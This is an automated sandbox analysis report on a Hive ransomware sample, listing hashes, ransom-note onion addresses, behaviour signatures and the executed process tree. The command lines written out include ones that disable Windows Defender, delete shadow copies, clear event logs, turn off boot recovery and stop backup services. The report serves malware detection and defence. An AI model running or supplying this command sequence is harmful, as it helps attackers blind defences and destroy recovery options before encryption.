Analysis
max time kernel: 1615s
max time network: 1686s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 30-10-2022 15:56
Static task: static1
Behavioral task: behavioral1
Sample: decoding_data.exe
Resource: win7-20220901-en
General
Target: decoding_data.exe
Size: 3.4MB
MD5: 177417be748814f6168171a42545f9dd
SHA1: 9c8b988e66e0fe6f9dab69b1055e4ee200531094
SHA256: 47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
SHA512: c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
SSDEEP: 49152:EynbnX4Rsrb/TFvO90dL3BmAFd4A64nsfJUvelzON7j93aqSCD0BUCoQPr8bg11t:EyrAe2lS75Hw+i4JROD5R
Malware Config
Extracted
Path: C:\Program Files\7-Zip\Djfk_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid | Process
1060 | MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Modifies security service 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
pid | Process
1688 | wevtutil.exe
1600 | wevtutil.exe
1544 | wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
1592 | bcdedit.exe
1376 | bcdedit.exe
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\CompareCopy.tiff => C:\Users\Admin\Pictures\CompareCopy.tiff.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_u6ERjnBSjN00.snwkz | decoding_data.exe
File opened for modification | C:\Users\Admin\Pictures\CompareCopy.tiff.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_u6ERjnBSjN00.snwkz | decoding_data.exe
Deletes itself 1 IoCs
pid | Process
156 | cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory 64 IoCs
Launches sc.exe 8 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1352 | sc.exe
1652 | sc.exe
1824 | sc.exe
524 | sc.exe
1708 | sc.exe
1916 | sc.exe
852 | sc.exe
1952 | sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
2032 | vssadmin.exe
Opens file in notepad (likely ransom note) 1 IoCs
pid | Process
1920 | notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
1496 | PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid | Process
760 | powershell.exe
580 | powershell.exe
1404 | decoding_data.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeSecurityPrivilege, SeBackupPrivilege | 1688 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 1600 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 1544 | wevtutil.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 | 1664 | wmic.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 | 1412 | wmic.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33 | 1412 | wmic.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1404 wrote to memory of 460 | 1404 | decoding_data.exe | 27
PID 460 wrote to memory of 1700 | 460 | net.exe | 29
PID 1404 wrote to memory of 1680 | 1404 | decoding_data.exe | 30
PID 1680 wrote to memory of 304 | 1680 | net.exe | 32
PID 1404 wrote to memory of 1720 | 1404 | decoding_data.exe | 33
PID 1720 wrote to memory of 884 | 1720 | net.exe | 35
PID 1404 wrote to memory of 1956 | 1404 | decoding_data.exe | 36
PID 1956 wrote to memory of 1188 | 1956 | net.exe | 38
PID 1404 wrote to memory of 1636 | 1404 | decoding_data.exe | 39
PID 1636 wrote to memory of 996 | 1636 | net.exe | 41
PID 1404 wrote to memory of 1436 | 1404 | decoding_data.exe | 42
PID 1436 wrote to memory of 680 | 1436 | net.exe | 44
PID 1404 wrote to memory of 1628 | 1404 | decoding_data.exe | 45
PID 1628 wrote to memory of 840 | 1628 | net.exe | 47
PID 1404 wrote to memory of 2036 | 1404 | decoding_data.exe | 48
PID 2036 wrote to memory of 920 | 2036 | net.exe | 50
PID 1404 wrote to memory of 1708 | 1404 | decoding_data.exe | 51
PID 1404 wrote to memory of 1916 | 1404 | decoding_data.exe | 53
PID 1404 wrote to memory of 852 | 1404 | decoding_data.exe | 55
PID 1404 wrote to memory of 1952 | 1404 | decoding_data.exe | 57
PID 1404 wrote to memory of 1352 | 1404 | decoding_data.exe | 59
PID 1404 wrote to memory of 1652 | 1404 | decoding_data.exe | 61
Processes
C:\Users\Admin\AppData\Local\Temp\decoding_data.exe (PID 1404)
    cmd: "C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe (PID 460)
      cmd: net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1700)
        cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  C:\Windows\system32\net.exe (PID 1680)
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 304)
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  C:\Windows\system32\net.exe (PID 1720)
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 884)
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  C:\Windows\system32\net.exe (PID 1956)
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1188)
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  C:\Windows\system32\net.exe (PID 1636)
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 996)
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  C:\Windows\system32\net.exe (PID 1436)
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 680)
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  C:\Windows\system32\net.exe (PID 1628)
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 840)
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  C:\Windows\system32\net.exe (PID 2036)
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 920)
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  C:\Windows\system32\sc.exe (PID 1708)
      cmd: sc.exe config "NetMsmqActivator" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 1916)
      cmd: sc.exe config "SamSs" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 852)
      cmd: sc.exe config "SDRSVC" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 1952)
      cmd: sc.exe config "SstpSvc" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 1352)
      cmd: sc.exe config "UI0Detect" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 1652)
      cmd: sc.exe config "VSS" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 1824)
      cmd: sc.exe config "wbengine" start= disabled
      - Launches sc.exe
  C:\Windows\system32\sc.exe (PID 524)
      cmd: sc.exe config "WebClient" start= disabled
      - Launches sc.exe
  C:\Windows\system32\reg.exe (PID 1888)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 1988)
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 988)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1864)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 2028)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 568)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\system32\reg.exe (PID 1684)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\system32\reg.exe (PID 1752)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\system32\reg.exe (PID 536)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\system32\reg.exe (PID 560)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\system32\reg.exe (PID 1868)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1464)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1156)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 920)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 1908)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 952)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\system32\schtasks.exe (PID 1356)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  C:\Windows\system32\schtasks.exe (PID 1168)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  C:\Windows\system32\schtasks.exe (PID 1112)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  C:\Windows\system32\schtasks.exe (PID 1780)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  C:\Windows\system32\schtasks.exe (PID 1996)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  C:\Windows\system32\reg.exe (PID 1892)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 1292)
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 1588)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  C:\Windows\system32\reg.exe (PID 1120)
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 1808)
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 1556)
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  C:\Windows\system32\reg.exe (PID 1108)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 2044)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 1424)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 976)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 916)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
  C:\Windows\system32\reg.exe (PID 1132)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\vssadmin.exe (PID 2032)
      cmd: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\system32\wevtutil.exe (PID 1688)
      cmd: wevtutil.exe cl system
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe (PID 1600)
      cmd: wevtutil.exe cl security
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe (PID 1544)
      cmd: wevtutil.exe cl application
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe (PID 1664)
      cmd: wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe (PID 1412)
      cmd: wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\bcdedit.exe (PID 1592)
      cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
  C:\Windows\system32\bcdedit.exe (PID 1376)
      cmd: bcdedit.exe /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
  C:\Windows\system32\cmd.exe (PID 840)
      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    C:\Program Files\Windows Defender\MpCmdRun.exe (PID 1060)
        cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions
  C:\Windows\system32\cmd.exe (PID 1480)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 760)
        cmd: powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe (PID 1116)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 580)
        cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\notepad.exe (PID 1920)
      cmd: notepad.exe C:\Djfk_HOW_TO_DECRYPT.txt
      - Opens file in notepad (likely ransom note)
  C:\Windows\system32\cmd.exe (PID 156)
      cmd: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"
      - Deletes itself
    C:\Windows\system32\PING.EXE (PID 1496)
        cmd: ping.exe -n 5 127.0.0.1
        - Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 1KB
MD5: 96ad57ef6f7c434f4642a95f782e1ffa
SHA1: 76b519f4c0d1b998e0c37ff3ffa8dc0024449eaa
SHA256: a1e2a8b6650198527b5066285ca32eaa06e583a282fa69511805979bb54560f1
SHA512: ba0ca31bc36c0d4e0868906a1f8576e902580286a68b2f137ea89a8c08f11c4d3fbce67e7327514ad0b37b6c3bdb7a6636742be99068bd661eaa70cbe41539c0

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: babaac0ddeabbadb4837b05b5856fee2
SHA1: 2243bc4c927aede79c981267d44970f0d7f6e495
SHA256: b8cc4831814c040575d0a5d8dc753acf9794fa9720518079500e258f672a7860
SHA512: 0579420756012ef8206c4eec579f510c1d08e06f16ed83f16539fa08c880976f8262713ab74db4a9769cf8586cfcc81ea52cc6a31aec3e590d3320a81587120f